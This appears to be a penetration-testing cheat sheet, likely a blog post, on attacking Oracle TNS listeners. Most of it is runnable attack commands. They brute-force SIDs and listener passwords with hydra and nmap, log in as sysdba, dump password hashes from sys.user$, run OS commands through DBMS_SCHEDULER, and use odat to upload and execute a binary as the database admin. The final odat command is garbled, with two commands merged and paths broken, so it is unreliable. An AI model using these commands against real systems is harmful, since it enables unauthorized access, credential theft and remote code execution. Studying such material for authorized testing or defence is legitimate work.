In Oracle SQL, a SID (Service Identifier) is basically a database.
Enumeration
Get general information
tnscmd10g -h $target
Try to get a SID:
tnscmd10g status-p 1521 -h $target
Another tool: Oracle Scanner
oscanner -s $target -P 1521
Metasploit module
scanner/oracle/tnslsnr_version
Brute force SID
hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 $target oracle-sid
nmap --script oracle-sid-brute -p 1521 $target
Brute force credentials
Brute force (only a password is needed, no username) for listener
hydra -P /usr/share/wordlists/rockyou.txt -t 32 -s 1521 $target oracle-listener
Or use odat
odat all -s $target -p 1521 [-d XE]
Command line enumeration
You probably want to use XE as $dbname.
export LD_LIBRARY_PATH=/usr/lib/oracle/19.6/client64/lib
sqlplus $user/$pass@$target/$dbname 'as sysdba'
Enumerate version
select * from v$version;
Enumerate users
select * from all_users;
Get all user information (also password hashes!) (See this article for background: spare4 is now used due to a migration from version 10.)
select name,password,spare4 from sys.user$;
Execute a command via the scheduler:
exec DBMS_SCHEDULER.create_program('RDS2008','EXECUTABLE','ping 10.10.14.12',0,TRUE);
exec DBMS_SCHEDULER.create_job(job_name => 'RDS2008JOB',program_name => 'RDS2008',start_date => NULL,repeat_interval => NULL,end_date => NULL,enabled => TRUE,auto_drop => TRUE)
exec DBMS_SCHEDULER.drop_program(PROGRAM_NAME => 'RDS2008');
Upload and execute as the DB admin (System?!)
odat utlfile -s $target -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp mps64.exe mps64.exe --sysdba odat externaltable -s $target -p 1521 -U "scott" -P "tiger" -d XE --exec C:\ s64.exe --sysdba
Leave a Reply
You must be logged in to post a comment.